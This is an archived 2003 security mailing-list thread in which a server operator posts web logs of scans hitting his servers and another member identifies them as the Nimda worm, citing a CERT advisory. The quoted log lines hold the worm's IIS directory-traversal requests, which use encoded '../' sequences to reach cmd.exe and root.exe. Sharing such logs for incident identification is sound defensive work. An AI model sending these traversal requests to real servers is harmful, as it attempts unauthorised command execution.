hrm ok, I'm going to crawl back into my hole now :) I'm kind of confused as to why i haven't see any of these patterns before the last 2 days though, Oh well. Thanks guys. On Tuesday, July 29, 2003, at 12:57 PM, Jason Falciola wrote: > Looks like plain old Nimda to me. Someone please correct me if I'm > missing something obvious. > > <http://www.cert.org/advisories/CA-2001-26.html> > > Jason Falciola > Security Intelligence Analyst > IBM Managed Security Services > falciolaat_private > > > > > > > Danny <dannyat_private> > 07/28/2003 11:24 PM > > > To: incidentsat_private > cc: > Subject: Anyone know this tool? > > > > Does anyone happen to know what tool this is? I've seen the exact same > scans on 6 of our servers on completely different networks. All the > scans have been from different source IP's and all the servers were hit > within a space of a few hours. > > Curiosity is getting the better of me since i've never seen this exact > pattern before :) > > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ > winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - > "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > > Danny > Work - http://www.eBoundary.com - Secure, FreeBSD hosting. > Play - http://www.eBoundary.net - Who really sets your electronic > boundaries? > AIM: eBoundaryTch | ICQ: 3090141 > > > ----------------------------------------------------------------------- > ---- > ----------------------------------------------------------------------- > ----- > > > > > > > Danny Work - http://www.eBoundary.com - Secure, FreeBSD hosting. Play - http://www.eBoundary.net - Who really sets your electronic boundaries? AIM: eBoundaryTch | ICQ: 3090141 --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 13:44:55 PDT